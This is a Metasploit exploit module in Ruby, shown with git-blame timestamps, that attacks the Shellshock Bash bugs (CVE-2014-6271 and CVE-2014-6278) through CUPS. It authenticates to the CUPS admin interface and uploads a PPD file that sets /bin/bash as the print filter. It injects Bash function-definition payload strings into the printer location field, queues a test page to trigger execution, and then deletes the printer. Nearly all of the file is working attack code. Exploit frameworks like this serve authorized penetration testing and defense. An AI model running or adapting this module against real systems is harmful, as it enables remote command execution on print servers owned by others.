metasploit-framework/modules/exploits/multi/http/cups_bash_env_exec.rb

268 lines
9.0 KiB
Ruby
Raw Normal View History

2014-10-19 17:58:49 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
2014-10-26 18:11:36 +00:00
Rank = GoodRanking
2014-10-19 17:58:49 +00:00
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a post-auth code injection in specially crafted
environment variables in Bash, specifically targeting CUPS filters
through the PRINTER_INFO and PRINTER_LOCATION variables by default.
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
2014-10-26 18:11:36 +00:00
'lcamtuf', # CVE-2014-6278
2014-10-19 17:58:49 +00:00
'Brendan Coles <bcoles[at]gmail.com>' # msf
],
'References' => [
['CVE', '2014-6271'],
2014-10-26 18:11:36 +00:00
['CVE', '2014-6278'],
2014-10-19 17:58:49 +00:00
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649']
],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
2014-10-26 18:11:36 +00:00
'Space' => 1024,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true
2014-10-19 17:58:49 +00:00
},
2014-10-26 18:11:36 +00:00
'Compat' =>
2014-10-19 17:58:49 +00:00
{
'PayloadType' => 'cmd',
2014-10-26 18:11:36 +00:00
'RequiredCmd' => 'generic bash awk ruby'
2014-10-19 17:58:49 +00:00
},
2014-10-26 18:11:36 +00:00
# Tested on CUPS 1.4.3 and 1.5.3
'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
2014-10-19 17:58:49 +00:00
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014',
'License' => MSF_LICENSE
))
register_options([
Opt::RPORT(631),
2014-10-26 18:11:36 +00:00
OptBool.new('SSL', [ true, 'Use SSL', true ]),
OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
2014-10-19 17:58:49 +00:00
], self.class)
end
#
2014-10-26 18:11:36 +00:00
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; $(#{cmd}) & }
end
#
# CVE-2014-6278
#
def cve_2014_6278(cmd)
%{() { _; } >_[$($())] { $(#{cmd}) & }}
end
#
# Check credentials
2014-10-19 17:58:49 +00:00
#
def check
2014-10-26 18:11:36 +00:00
@cookie = rand_text_alphanumeric(16)
printer_name = rand_text_alphanumeric(10 + rand(5))
res = add_printer(printer_name, '')
if !res
vprint_error("#{peer} - No response from host")
return Exploit::CheckCode::Unknown
elsif res.body =~ /Set Default Options for #{printer_name}/
vprint_good("#{peer} - Added printer successfully")
delete_printer(printer_name)
return Exploit::CheckCode::Detected
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
vprint_error("#{peer} - Authentication failed")
return Exploit::CheckCode::Detected
elsif res.code == 426
vprint_error("#{peer} - SSL required - set SSL true")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
2014-10-19 17:58:49 +00:00
end
#
# Exploit
#
def exploit
@cookie = rand_text_alphanumeric(16)
2014-10-26 18:11:36 +00:00
printer_name = rand_text_alphanumeric(10 + rand(5))
# Select target CVE
case datastore['CVE']
when 'CVE-2014-6278'
cmd = cve_2014_6278(payload.raw)
else
cmd = cve_2014_6271(payload.raw)
end
2014-10-19 17:58:49 +00:00
2014-10-26 18:11:36 +00:00
# Add a printer containing the payload
# with a CUPS filter pointing to /bin/bash
res = add_printer(printer_name, cmd)
2014-10-19 17:58:49 +00:00
if !res
2014-10-26 18:11:36 +00:00
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
2014-10-19 17:58:49 +00:00
elsif res.body =~ /Set Default Options for #{printer_name}/
2014-10-26 18:11:36 +00:00
print_good("#{peer} - Added printer successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
else
fail_with(Failure::Unknown, "#{peer} - Could not add printer.")
2014-10-19 17:58:49 +00:00
end
2014-10-26 18:11:36 +00:00
# Add a test page to the print queue.
2014-10-19 17:58:49 +00:00
# The print job triggers execution of the bash filter
2014-10-26 18:11:36 +00:00
# which executes the payload in the environment variables.
2014-10-19 17:58:49 +00:00
res = print_test_page(printer_name)
2014-10-26 18:11:36 +00:00
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
elsif res.body =~ /Test page sent; job ID is/
vprint_good("#{peer} - Added test page to printer queue")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
else
fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.")
2014-10-19 17:58:49 +00:00
end
# Delete the printer
res = delete_printer(printer_name)
2014-10-26 18:11:36 +00:00
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
elsif res.body =~ /has been deleted successfully/
print_status("#{peer} - Deleted printer '#{printer_name}' successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.")
elsif res.code == 426
vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.")
else
vprint_warning("#{peer} - Could not delete printer '#{printer_name}'")
2014-10-19 17:58:49 +00:00
end
end
#
2014-10-26 18:11:36 +00:00
# Add a printer to CUPS
2014-10-19 17:58:49 +00:00
#
2014-10-26 18:11:36 +00:00
def add_printer(printer_name, cmd)
vprint_status("#{peer} - Adding new printer '#{printer_name}'")
2014-10-19 17:58:49 +00:00
2014-10-26 18:11:36 +00:00
ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd"
2014-10-19 17:58:49 +00:00
ppd_file = <<-EOF
*PPD-Adobe: "4.3"
*%==== General Information Keywords ========================
*FormatVersion: "4.3"
*FileVersion: "1.00"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
2014-10-26 18:11:36 +00:00
*PCFileName: "#{ppd_name}"
2014-10-19 17:58:49 +00:00
*Manufacturer: "Brother"
*Product: "(Brother MFC-3820CN)"
*1284DeviceID: "MFG:Brother;MDL:MFC-3820CN"
*cupsVersion: 1.1
*cupsManualCopies: False
2014-10-26 18:11:36 +00:00
*cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash"
*cupsModelNumber: #{rand(10) + 1}
2014-10-19 17:58:49 +00:00
*ModelName: "Brother MFC-3820CN"
*ShortNickName: "Brother MFC-3820CN"
*NickName: "Brother MFC-3820CN CUPS v1.1"
*%
2014-10-26 18:11:36 +00:00
*%==== Basic Device Capabilities =============
*LanguageLevel: "3"
*ColorDevice: True
*DefaultColorSpace: RGB
*FileSystem: False
*Throughput: "12"
*LandscapeOrientation: Plus90
*VariablePaperSize: False
*TTRasterizer: Type42
*FreeVM: "1700000"
2014-10-19 17:58:49 +00:00
2014-10-26 18:11:36 +00:00
*DefaultOutputOrder: Reverse
*%==== Media Selection ======================
*OpenUI *PageSize/Media Size: PickOne
*OrderDependency: 18 AnySetup *PageSize
*DefaultPageSize: BrLetter
*PageSize BrA4/A4: "<</PageSize[595 842]/ImagingBBox null>>setpagedevice"
*PageSize BrLetter/Letter: "<</PageSize[612 792]/ImagingBBox null>>setpagedevice"
EOF
2014-10-19 17:58:49 +00:00
pd = Rex::MIME::Message.new
2014-10-26 18:11:36 +00:00
pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}"))
pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid"))
pd.add_part("add-printer", nil, nil, %(form-data; name="OP"))
pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME"))
pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable
pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable
pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI"))
2014-10-19 17:58:49 +00:00
data = pd.to_s
data.strip!
2014-10-26 18:11:36 +00:00
send_request_cgi(
2014-10-19 17:58:49 +00:00
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin'),
'ctype' => "multipart/form-data; boundary=#{pd.bound}",
'data' => data,
'cookie' => "org.cups.sid=#{@cookie};",
2014-10-26 18:11:36 +00:00
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
)
2014-10-19 17:58:49 +00:00
end
#
2014-10-26 18:11:36 +00:00
# Queue a printer test page
2014-10-19 17:58:49 +00:00
#
2014-10-26 18:11:36 +00:00
def print_test_page(printer_name)
vprint_status("#{peer} - Adding test page to printer queue")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'printers', printer_name),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => "org.cups.sid=#{@cookie}",
'vars_post' => {
'org.cups.sid' => @cookie,
'OP' => 'print-test-page'
2014-10-19 17:58:49 +00:00
}
)
end
#
# Delete a printer
#
2014-10-26 18:11:36 +00:00
def delete_printer(printer_name)
vprint_status("#{peer} - Deleting printer '#{printer_name}'")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => "org.cups.sid=#{@cookie}",
'vars_post' => {
'org.cups.sid' => @cookie,
'OP' => 'delete-printer',
'printer_name' => printer_name,
'confirm' => 'Delete Printer'
2014-10-19 17:58:49 +00:00
}
)
end
end